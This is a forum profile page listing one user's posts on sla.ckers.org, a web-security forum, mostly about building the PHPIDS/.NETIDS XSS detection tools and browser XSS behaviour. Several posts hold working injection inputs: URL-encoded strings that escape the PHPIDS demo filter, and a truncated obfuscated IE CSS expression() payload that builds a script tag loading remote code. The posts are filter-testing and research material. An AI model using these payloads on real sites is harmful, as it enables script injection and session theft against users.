Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 90
6 years ago
Martin
Heya, Finally getting some time and resurrecting the .NETIDS, which was having severe memory consumption issues in its last build :/ Anyway, found a bug in one of the Regex expressions in convertFromJSCharcode: if (preg_match_all('/\d*[+-\/\* ]\d+/', $char, $matches)) { This should match optional digits, + or - or / or * or \s, and then digits. It actually matches optional digits, a
Forum: Projects
7 years ago
Martin
Awesome vector - amazing work!
Forum: Projects
7 years ago
Martin
Just a quick note about .NETIDS which I really want to share! There is now support on the SmokeTest for detection of fragmented XSS attacks! I posted full details at http://the-mice.co.uk/switch/index.php/archives/27 but a basic example can be found at: http://www.the-mice.co.uk/SmokeTest/SmokeTest.aspx?param1=Hello%20&param2=this%20&param3=is%20a%20test! and http://www.the-m
Forum: Projects
7 years ago
Martin
I've done the initial work on a port to .NET (c#). Work is at http://code.google.com/p/dotnetids/ Missing: Complete XMLDOC comments Some IEnumerable implementations Still, it works, here's a test page using it: IDS.IDS ids = new IDS.IDS(Request.QueryString); ids.Run(); Label1.Text = "Total Impact: " + ids.Report.Impact.ToString();
Forum: Projects
7 years ago
Martin
@.mario - I tried http://phpids.heideri.ch/?test=/../thisfile and it triggered no warnings that this was dangerous input... is that what you meant?
Forum: Projects
7 years ago
Martin
What about detecting directory traversals (../) which could be useful when trying to avoid LFI vulnerabilities?
Forum: Projects
7 years ago
Martin
@.mario - firstly, I apologise for those !!!!s after the URL - they were meant to be part of it hehe. I agree that catching > will generate too many false positives. Maybe this is one that will just have to be let go - I mean you can write a new attribute simply by putting a space after some text in the a href no quotes.
Forum: Projects
7 years ago
Martin
@.mario - it's still escapable via http://phpids.heideri.ch/?test=%3Etest%3C/a%3E%20ESCAPED%20AGAIN!!!! I'm not sure how this can be detected really, unless you disallow >, but this is essentially allowing a malicious individual to write their content onto the page - ie. could forge a link to "login".
Forum: Projects
7 years ago
Martin
http://phpids.heideri.ch/?test=test1%20/%3Etest%3Ca%3E%20I%20have%20escaped!%20%3Ca%20href=%22backin%22 I don't know if this counts or not - it escapes the a href no quotes - which is definitely malicious input although not of a high severity.
Forum: Projects
7 years ago
Martin
@Hong: which browser does that work in? I can't replicate in FF or IE7...
Forum: Projects
6 years ago
Martin
Nice concept - been thinking about that for a while. What about expanding it to attempt to locate pre-existing segments of the web. This would mean breaking down the segments much further, and you'd need to somehow CRC the segment, but it would mean that technically the data couldn't be taken down, because it would be truly distributed and all parts of the content hosted by different people.
Forum: Projects
6 years ago
Martin
I agree that NoScript's protection against XBL binding is ace and I in no way meant to detract from this; took me ages to work out why a binding wasn't working and it was good old NoScript doing its job! On the other hand, while the in-line feature is documented, the blocking of cross-domain XBL loading is not so easy to find out about. As I pointed out, one obliterates the security impact of t
Forum: XSS Info
6 years ago
Martin
Hey all, Don't know if anyone has already looked at this (I found a passing reference by Giorgio at http://hackademix.net/2007/12/25/merry-xssmas/ ), and apologies if they have and I'm duplicating it, but FF3 disallows cross-site XBL requests, so no more off-site -moz-binding commands. However, in their infinite wisdom, the moz devs have decided that allowing inline XBL is ok. Go figure.
Forum: XSS Info
6 years ago
Martin
Indeed, what riahmatic says is right. The only context where this is useful is when an image is being loaded in some form of execution context. Eg. <script src="exploit.gif" /> In this case, the contents of exploitt.gif are evaluated as javascript. In the scenario you are describing, the image is being evaluated as an image. Not as a script of any kind, the valid heade
Forum: XSS Info
6 years ago
Martin
document.cookie not document.cookies ?
Forum: XSS Info
6 years ago
Martin
You know about attribute injection right? Occurs when a site echoes back user supplied input into a tags attributes. If you can escape the attribute you can attach a style tag that takes malicious action.
Forum: XSS Info
6 years ago
Martin
If you can't escape the attribute then obviously you can't screw up the tag. If quotes are encoded then I'd assume that others will be suitably handled as well...
Forum: XSS Info
6 years ago
Martin
@Gareth: I see your point, but I still think it's not clear cut; as I stated, in any exploit the payload ultimately becomes "local" :)
Forum: XSS Info
6 years ago
Martin
Because attributes are normally (except in insane cases) set on Controls' properties rather than by outputting directly to the page they automatically go through the correct encoding methods.
Forum: XSS Info
6 years ago
Martin
"It's always local because it's executed on the client." If I may present a dissenting opinion :P In terms of what is vulnerable: -the web browser is operating as expected, parsing a web page -the web application is serving different content than intended based upon malicious remote input It is therefore the structure of the web page, via the web application, that is vulnera
Forum: XSS Info
6 years ago
Martin
It could be that the site will only recognise cookies that come from the same IP address as the originator. Alternatively there could be an HttpOnly cookie hidden that you are not receiving.
Forum: CSRF and Session Info
6 years ago
Martin
I suspect this will be handled on the server side... so no. If you can inject some javascript you could replace the time and date, but if you can inject javascript that would not be the first thing I would do.
Forum: Projects
6 years ago
Martin
@DoctorDan My apologies also - it's such a good tip that I saved it at the time and then completely forgot where it came from!
Forum: XSS Info
6 years ago
Martin
You can actually bind to anything:expression() - I normally use xx:expression The trick for multiple statements is to use an eval: style=”xx: expression((window.r!=1) ? eval(’x=String.fromCharCode;scr=document.createElement(x(115,99,114,105,112,116));scr.setAttribute(x(115,114,99),x(104,116,116,112,58,47,47,ETC));document.getElementById(x(99,104,101,109,45,110,97,118,45,102,111,114,117,1
Forum: XSS Info
6 years ago
Martin
Glad you liked it Gareth :) The main problem was getting IE to not go into it's stupid bloody loop, which the window.r trick nicely avoids. Also really nice work integrating that into Hackvertor - really useful as my patience with encoding things manually is fast wearing thin!
Forum: XSS Info
7 years ago
Martin
Mephisto: They might have disabled RequestValidation - he did say weak applications!
Forum: XSS Info
7 years ago
Martin
Either that or the cookies are HttpOnly...
Forum: XSS Info
7 years ago
Martin
Ronald: haven't you checked out #websechotties on freenode - it's just about the largest channel on there! Welcome FOLD :)
Forum: Intro
7 years ago
Martin
29. Re: IRC
/me joins the party
Forum: OMG Ponies
7 years ago
Martin
30. IRC
Don't know if this has been raised before, but is there any possibility of a slackers irc channel? If one can't be set up on the web server then what about something like ##websec on freenode (not currently in existence)? Martin
Forum: OMG Ponies
Pages: 123Next
Current Page: 1 of 3